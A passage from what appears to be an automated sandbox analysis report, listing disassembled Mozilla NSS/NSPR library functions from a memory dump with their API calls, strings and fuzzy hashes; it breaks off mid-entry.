Opcode Fuzzy Hash: 283c9ea25cd19b75596aa3c1742f8d9b5b794c571bd6679ce542dad2468a94c1
Instruction Fuzzy Hash: B2418CB5A04615CFCB00EF7DD884159BBF4BF46318F058A69DC889BB50EB34D894CB86

Function 6C5C8F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C5C9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C5C9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C90EC

Part of subcall function 6C590F00: PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B
Part of subcall function 6C590F00: PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C9111

Strings

nkl, xrefs: 6C5C90A3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nkl
API String ID: 2831689957-1663185687
Opcode ID: 788b498f6c07c29a93adbba2df2a500dc417992103c3f7904d7b01402b82a262
Instruction ID: 9111432f5a6273a879879e15e808384085a7248b7c0441087b2f0d5a73e8df18
Opcode Fuzzy Hash: 788b498f6c07c29a93adbba2df2a500dc417992103c3f7904d7b01402b82a262
Instruction Fuzzy Hash: D4517BB5B046458FDB00EFB9C8C8259BBF5AF49318F0549ADDC459B716EB30E884CB92

Function 6C6B7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C6B7CE0

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7D36
PR_Realloc.NSS3(?,00000080), ref: 6C6B7D6D
PR_GetCurrentThread.NSS3 ref: 6C6B7D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C6B7DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7DD8
malloc.MOZGLUE(00000080), ref: 6C6B7DF8
PR_GetCurrentThread.NSS3 ref: 6C6B7E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C6B7DF0
:%s:%d:0x%lx, xrefs: 6C6B7DB9

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 0fcdcbe17847347c489f8f3640515f5496f504f50c3e95912245e7363a60fc16
Instruction ID: 206e739f594a1d45cd942780e2047a26ca33304f5e899cc9cdb18275a9904406
Opcode Fuzzy Hash: 0fcdcbe17847347c489f8f3640515f5496f504f50c3e95912245e7363a60fc16
Instruction Fuzzy Hash: 0341C6B15002059FDB04CF29CC819AB37F6FF85358B25456CE819ABB52D731F861CBA9

Function 6C6B7E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C6B7E46

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C6B7EAF
PR_ImportFile.NSS3(?), ref: 6C6B7ECF
PR_GetCurrentThread.NSS3 ref: 6C6B7ED6
PR_ImportTCPSocket.NSS3(?), ref: 6C6B7F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6C6B7F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6C6B7F15

Strings

%d:0x%lx, xrefs: 6C6B7EA9
NSPR_INHERIT_FDS, xrefs: 6C6B7E41

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: dd6ba46e4331501657e15c255324926077e320436b59309e462b49fe30f04f22
Instruction ID: 441c716e2a1cb2c9e07780e3bee7b6852e6db605da67cd2558da8664b747ac2f
Opcode Fuzzy Hash: dd6ba46e4331501657e15c255324926077e320436b59309e462b49fe30f04f22
Instruction Fuzzy Hash: 23313770904119DBDB009B69C840AEBB7A9FF86348F100565E816B7A11E7319D27C7AE

Function 6C5C4E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5C4E90
EnterCriticalSection.KERNEL32 ref: 6C5C4EA9
TlsGetValue.KERNEL32 ref: 6C5C4EC6
EnterCriticalSection.KERNEL32 ref: 6C5C4EDF
PL_HashTableLookup.NSS3 ref: 6C5C4EF8
PR_Unlock.NSS3 ref: 6C5C4F05
PR_Now.NSS3 ref: 6C5C4F13
PR_Unlock.NSS3 ref: 6C5C4F3A

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

Strings

bU\l, xrefs: 6C5C4F3F
bU\l, xrefs: 6C5C4E5C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bU\l$bU\l
API String ID: 326028414-2399824368
Opcode ID: 37e7a7b1da29b3e1b9c913d7c9be8f150bfac9585a4013e2de5a61ed26d41e17
Instruction ID: 0d245ed581de3d653e54e9648ab03684f1d420605c2ce309e8102ceb60c8cedb
Opcode Fuzzy Hash: 37e7a7b1da29b3e1b9c913d7c9be8f150bfac9585a4013e2de5a61ed26d41e17
Instruction Fuzzy Hash: 23415BB4A00605DFCB00EF79D4848AABBF4FF49314F018969EC599B711EB30E855CB96

Function 6C5D6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C5D6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D6CA3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C5D6CD5

Strings

pMechanism = 0x%p, xrefs: 6C5D6CD0
hSession = 0x%x, xrefs: 6C5D6C7E, 6C5D6C8E
nkl, xrefs: 6C5D6CF4, 6C5D6D1F
C_DigestInit, xrefs: 6C5D6C61
(CK_INVALID_HANDLE), xrefs: 6C5D6C9C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nkl
API String ID: 1003633598-4246847897
Opcode ID: d5922d32dd730da651241e2e5a34b01700353a1f52098e24de288c02d9ef47cc
Instruction ID: 6daed0beb4cfc4cbc21e8f59781c13e34581a465f04744a727de08546de9d584
Opcode Fuzzy Hash: d5922d32dd730da651241e2e5a34b01700353a1f52098e24de288c02d9ef47cc
Instruction Fuzzy Hash: F42139B17003049BD700AF59ED48B4A37B5EB83319F464439E409E7B12DF30A809CB9E

Function 6C5D9DD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6C5D9DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D9E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9E33

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D9E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6C5D9E65

Strings

flags = 0x%x, xrefs: 6C5D9E60
hSession = 0x%x, xrefs: 6C5D9E0E, 6C5D9E1E
C_SessionCancel, xrefs: 6C5D9DF1
nkl, xrefs: 6C5D9E7D, 6C5D9EA8
(CK_INVALID_HANDLE), xrefs: 6C5D9E2C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel$nkl
API String ID: 1003633598-1309049317
Opcode ID: c3f2e0757cfe7dcd443ba566ce234995b40433c103b1f7d6fc32bef6bea0bffe
Instruction ID: 58a19d5dda0f28d2670421bdc1e3f4be6017b6f998b408556a9907706645f594
Opcode Fuzzy Hash: c3f2e0757cfe7dcd443ba566ce234995b40433c103b1f7d6fc32bef6bea0bffe
Instruction Fuzzy Hash: F721B4B2701249AFE7009F58DD98B6A37B5EB8231DF454439E409A7711DF34AC48CBAA

Function 6C5EECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C5EDE64), ref: 6C5EED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5EED22

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PL_FreeArenaPool.NSS3(?), ref: 6C5EED4A
PL_FinishArenaPool.NSS3(?), ref: 6C5EED6B
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5EED38

Part of subcall function 6C524C70: TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
Part of subcall function 6C524C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
Part of subcall function 6C524C70: PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C5EED52
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5EED83
PL_FreeArenaPool.NSS3(?), ref: 6C5EED95
PL_FinishArenaPool.NSS3(?), ref: 6C5EED9D

Part of subcall function 6C6064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C60127C,00000000,00000000,00000000), ref: 6C60650E

Strings

security, xrefs: 6C5EED06

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 21df512ff3fbce7d414d04f3df40d987f7d2ff82ff66dc1732aba9e9a4047c91
Instruction ID: bed7850698839cccbf84e4c95ee19dccf11d1de2fa06473aa9bbf0f722b13900
Opcode Fuzzy Hash: 21df512ff3fbce7d414d04f3df40d987f7d2ff82ff66dc1732aba9e9a4047c91
Instruction Fuzzy Hash: 9B116DB2B00204A7D7149725AE41BBB7278AF4670CF05093CEC5472E41FB64A54CCADF

Function 6C6B0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C592357), ref: 6C6B0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C592357), ref: 6C6B0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C6B0EE6

Part of subcall function 6C6B09D0: PR_Now.NSS3 ref: 6C6B0A22
Part of subcall function 6C6B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C6B0A35
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C6B0A66
Part of subcall function 6C6B09D0: PR_GetCurrentThread.NSS3 ref: 6C6B0A70
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C6B0A9D
Part of subcall function 6C6B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C6B0AC8
Part of subcall function 6C6B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C6B0AE8
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0B19
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0B48
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0C76
Part of subcall function 6C6B09D0: PR_LogFlush.NSS3 ref: 6C6B0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C6B0EFA

Part of subcall function 6C59AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C59AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C6B0ED9, 6C6B0EE5, 6C6B0F06, 6C6B0F0B
Aborting, xrefs: 6C6B0EB3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 31fca934aae30f04981ae55b5043bacff35ffa3a922d8363a1ecba9a424b86e6
Instruction ID: 80ca8d378cd9703bbecb067c93fd9ac72598431f862cb7ff7a1bd3fdb318a77c
Opcode Fuzzy Hash: 31fca934aae30f04981ae55b5043bacff35ffa3a922d8363a1ecba9a424b86e6
Instruction Fuzzy Hash: C0F0A4F59001187BEB107B61AC89C9F3E2EDF86264F004424FD1A56602DA35ED2596BB

Function 6C614DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C614DCB

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C614DE1

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C614DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C614E59

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6D300C,00000000), ref: 6C614EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C614EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C614F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C61521A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 1edff58849d46e50cc132e149d58ef805e9caf9276fb1d9d780c74675a1e9034
Instruction ID: 98d5ab9b9c3083a57557667e3b62fb9099563a5d650dea4f69acfec6918eccd2
Opcode Fuzzy Hash: 1edff58849d46e50cc132e149d58ef805e9caf9276fb1d9d780c74675a1e9034
Instruction Fuzzy Hash: ECF1AD71E08209CFDB04CF59D8407ADB7B2FF8431AF254129E815ABB80E775E982CB94

Function 6C5A4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A502A
PR_NewLock.NSS3(00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A5034
PL_NewHashTable.NSS3(00000000,6C5FFE80,6C5FFD30,6C64C350,00000000,00000000,00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A5055
PL_NewHashTable.NSS3(00000000,6C5FFE80,6C5FFD30,6C64C350,00000000,00000000,?,00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A506D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 0905bc6132a75e368a81ce5681967ec99df18381044d16ede117fc759c2d6e12
Instruction ID: 7d64ced330b4efaac88f45c7db2918252ea551067d36a7f5737e9bd9556c0c51
Opcode Fuzzy Hash: 0905bc6132a75e368a81ce5681967ec99df18381044d16ede117fc759c2d6e12
Instruction Fuzzy Hash: F431B3F2B016109BEB109BA79C8CB5B37B8AB27388F614139EA15C3A41DBB59405CBD1

Function 6C542E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C542F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C542FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C543005
memcpy.VCRUNTIME140(?,?,?), ref: 6C5430EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C543131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C543178

Strings

